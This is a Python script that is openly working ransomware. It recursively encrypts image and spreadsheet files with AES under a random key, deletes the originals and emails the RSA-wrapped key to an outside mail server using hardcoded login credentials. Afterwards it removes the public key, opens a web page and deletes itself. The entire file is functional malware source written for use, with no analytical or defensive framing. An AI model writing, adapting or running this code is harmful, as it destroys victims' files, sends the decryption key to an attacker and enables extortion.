#!/usr/bin/python3

from sys import argv
from os import walk, lstat
from os.path import getsize, splitext, join
from os import remove as rm
from struct import pack, unpack, calcsize
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
import Crypto.Random as rand
import webbrowser
import smtplib

def enc_key(key):
        k = rand.new().read(1)
        f = open("pubkey", "r");
        pub = RSA.importKey(f.read())
        f.close()
        return (pub.encrypt(key, k))

def sendMail(FROM, PASSWD, TO, TEXT, SERVER):
    message = """\
    From: %s
    To: %s
    %s
    """ % (FROM, TO, TEXT)
    server = smtplib.SMTP(SERVER)
    server.starttls()
    server.login(FROM, PASSWD)
    server.sendmail(FROM, TO, message)
    server.quit()

def mail(s):
    sender='youhavebeenhacked@pata.ovh'
    mdp='bunny12pixel'
    server='mail.pata.ovh:587'
    sendMail(sender,mdp,sender,s,server)

AUTORM=not "-keep" in argv
LEN_READ=1024
FILE_EXT='.enc'

TARGETS=(".jpg", ".ini", ".xls", ".xlsx")

if not len(argv) in [2, 3] or (len(argv)==2 and not AUTORM) or (len(argv)==3 and AUTORM):
        print("%s directory [-keep]"%(argv[0]))
        exit(0)

def recur_mtime(path):
        for dirpath, dirnames, filenames in walk(path):
                for fn in filenames:
                        filepath=join(dirpath, fn)
                        try:
                                mtime=lstat(filepath).st_mtime
                        except:
                                mtime=0.0
                        yield mtime, filepath

def walk_sorted(path):
        global TARGETS
        for mtime, filepath in sorted(recur_mtime(path),reverse=True):
                if filepath.endswith(TARGETS):
                        yield filepath

def crypt(key, filename):
    global LEN_READ, FILE_EXT
    newname=filename+FILE_EXT
    iv=rand.new().read(16)
    size=getsize(filename)
    cryptor = AES.new(key, AES.MODE_CBC, iv)
    with open(filename, "rb") as f_in:
        with open(newname, "wb") as f_out:
            f_out.write(pack('Q', size))
            f_out.write(iv)
            while True:
                txt=f_in.read(LEN_READ)
                l=len(txt)
                if l != LEN_READ:
                    if not l:
                        break
                    txt+=rand.new().read(LEN_READ - l)
                f_out.write(cryptor.encrypt(txt))
                del txt
                
def crypted_file(filename):
    global FILE_EXT
    return (True if filename.endswith(FILE_EXT) else False)

try:
        key=rand.new().read(16)
        sent_key=enc_key(key)
        mail(sent_key[0])
except:
        print("Key failure")
        exit(0)
if AUTORM:
        try:
                rm("pubkey")
        except:
                pass
if len(key)!=16:
        print("Key failure")
        exit(0)

for name in walk_sorted(argv[1]):
        if not crypted_file(name):
                try:
                        crypt(key, name)
                        rm(name)
                except:
                        print("Encrypt failure : {}".format(name))

webbrowser.open_new('http://bunnypixelarray.github.io')
if AUTORM:                        
        try:
                rm(argv[0])
        except:
                print("auto-remove failure")
